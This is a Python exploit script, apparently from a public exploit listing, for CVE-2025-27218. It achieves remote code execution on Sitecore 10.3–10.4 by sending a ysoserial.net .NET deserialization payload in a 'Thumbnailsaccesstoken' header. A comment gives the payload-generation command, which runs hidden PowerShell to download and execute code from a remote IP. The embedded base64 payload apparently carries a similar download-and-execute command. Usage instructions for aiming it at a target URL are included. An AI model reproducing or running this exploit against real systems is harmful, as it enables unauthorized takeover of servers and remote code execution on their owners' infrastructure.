# Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://developers.sitecore.com/downloads # Version: Sitecore 10.3 - 10.4 # CVE : CVE-2025-27218 # Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py from requests import Request, Session import sys import base64 def title(): print(''' _______ ________ ___ ___ ___ _____ ___ ______ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \____ |__ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | / / ) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|___ \______/ / / / / / | |> _ < | |____ \ / | |____ / /_| |_| / /_ ___) | / /_ / / / /_ | | (_) | \_____| \/ |______| |____|\___/____|____/ |____/_/ |____||_|\___/ [+] Remote Code Execution Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py ''') def exploit(url): # This payload must be generated externally with ysoserial.net # Example: ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://34.134.71.169/111.html\")'" payload = 'AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L' payload_encoded = payload headers = {'Thumbnailsaccesstoken': payload_encoded} s = Session() req = Request('GET', url, headers=headers) prepped = req.prepare() resp = s.send(prepped, verify=False, timeout=15) print(prepped.headers) print(url) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if len(sys.argv) < 2: print('[+] USAGE: python3 %s https://\n' % sys.argv[0]) print('[+] Example: python3 %s https://192.168.0.10\n' % sys.argv[0]) exit(0) else: exploit(sys.argv[1])